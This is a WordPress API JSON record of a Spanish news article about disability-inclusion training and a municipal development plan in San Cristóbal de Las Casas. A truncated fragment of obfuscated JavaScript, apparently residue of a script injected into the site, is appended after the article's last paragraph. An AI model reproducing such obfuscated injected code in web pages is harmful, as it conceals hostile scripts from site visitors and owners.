{"id":22242,"date":"2025-06-04T05:39:46","date_gmt":"2025-06-04T05:39:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22242"},"modified":"2025-06-04T05:39:47","modified_gmt":"2025-06-04T05:39:47","slug":"sclc-impulsa-la-inclusion-con-capacitaciones-y-presentacion-de-plan-municipal-de-desarrollo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22242","title":{"rendered":"SCLC impulsa la inclusi\u00f3n con capacitaciones y presentaci\u00f3n de plan municipal de desarrollo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151235.jpg\" alt=\"\" class=\"wp-image-22243\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151235.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000151235-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodriguez\/ corresponsal<br>3 de junio del 2025. San Crist\u00f3bal de Las Casas.- Durante el mes de mayo, la Coordinaci\u00f3n Municipal para la Atenci\u00f3n de Personas con Discapacidad del Ayuntamiento de esta ciudad llev\u00f3 a cabo una intensa agenda de capacitaciones orientadas principalmente a actuales y futuros profesionales de la salud, considerados clave como primera l\u00ednea de atenci\u00f3n a personas con discapacidad.<\/p>\n\n\n\n<p>Las actividades no se limitaron al municipio, ya que tambi\u00e9n se extendieron a Venustiano Carranza y Chiapa de Corzo, en una muestra de colaboraci\u00f3n intermunicipal y compromiso compartido con la construcci\u00f3n de una cultura de inclusi\u00f3n. \u201cDesde la Coordinaci\u00f3n estamos contentos de compartir nuestra forma de trabajo y experiencia con municipios hermanos que ya han iniciado su camino hacia una sociedad m\u00e1s incluyente\u201d, se\u00f1alaron representantes de la dependencia.<\/p>\n\n\n\n<p>Uno de los hitos del mes fue la presentaci\u00f3n oficial, el pasado 26 de mayo, del Plan Municipal de Desarrollo, ante la Comisi\u00f3n de Derechos Humanos y la ciudadan\u00eda. Este plan, que delinear\u00e1 las acciones estrat\u00e9gicas para los pr\u00f3ximos tres a\u00f1os, ya puede consultarse en las redes sociales oficiales o directamente en las oficinas de la coordinaci\u00f3n, ubicadas en el CEDECO El Rastro.<\/p>\n\n\n\n<p>Desde la Coordinaci\u00f3n se reconoci\u00f3 de manera especial el apoyo del DIF Municipal, particularmente en materia de transporte para las actividades realizadas fuera del municipio, as\u00ed como a todas las personas e instituciones que contribuyeron a la realizaci\u00f3n de estas acciones.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodriguez\/ corresponsal3 de junio del 2025. San Crist\u00f3bal de Las Casas.- Durante el mes de mayo, la Coordinaci\u00f3n Municipal para la Atenci\u00f3n de Personas con Discapacidad del Ayuntamiento de esta ciudad llev\u00f3 a cabo una intensa agenda de capacitaciones orientadas principalmente a actuales y futuros profesionales de la salud, considerados clave como primera l\u00ednea &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22243,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22242","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22242","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22242"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22242\/revisions"}],"predecessor-version":[{"id":22244,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22242\/revisions\/22244"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22243"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}